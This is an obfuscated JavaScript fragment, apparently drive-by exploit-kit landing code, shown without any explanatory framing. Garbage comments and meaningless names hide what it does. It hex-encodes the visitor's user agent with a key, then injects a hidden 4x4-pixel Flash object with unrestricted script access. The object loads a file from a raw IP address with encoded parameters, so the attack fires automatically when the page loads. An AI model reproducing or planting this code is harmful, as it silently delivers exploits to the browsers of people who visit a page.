/*s60379d49648hssfj16644fs*/function hgfgerdfgdf(num, width){/*s85233d27362hfj15475fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s78308d29207hfj35218fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s31322d87710hfj32182fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s91361d50351hfj46687fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd88252hfs*/c += b + d;/*s13496d91851hfj45545fs*/e += 1;}return c;}/*s52594dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.77.30/?MTExNzI2NzE3&information=MTQ4MDM3ODY=&round=fpjEaBfQdjm4dfVVob9qqniUDSzh-ehpGG_xTYZAhEq8SXHeMz2QmgzbMkecomxRWF61ETi-tL&newest=xX_QMvWebRXQCJ3EKvncT6NEMVHRH0CL2Y-dmrHTefjaeVWkzrHFTF_yozKASASG6_JtdfJRDQ&around=NjEwMTEyNA==", ghnvbn("http://188.225.77.30/?MTA1MzM0Nzcz&newest=xH_QMrDYbR3FFYDfKPrEUKREMU7WA0eKwYyZha_VF5yxFDTGpbH1FxzspVydCFyEmvJvdLMHIwKh1UTASwd&information=MTQ3NjYzMjc=&round=llIxeU1gV9auph0DSyRSUg5aL-heKZgtM-ZCTELM6jVzwzrNAJskulRSKvWAFzugtWlgX4wsbmKz7S6CJrg&shield=NDMwNDM2NQ==","gexywoaxor"));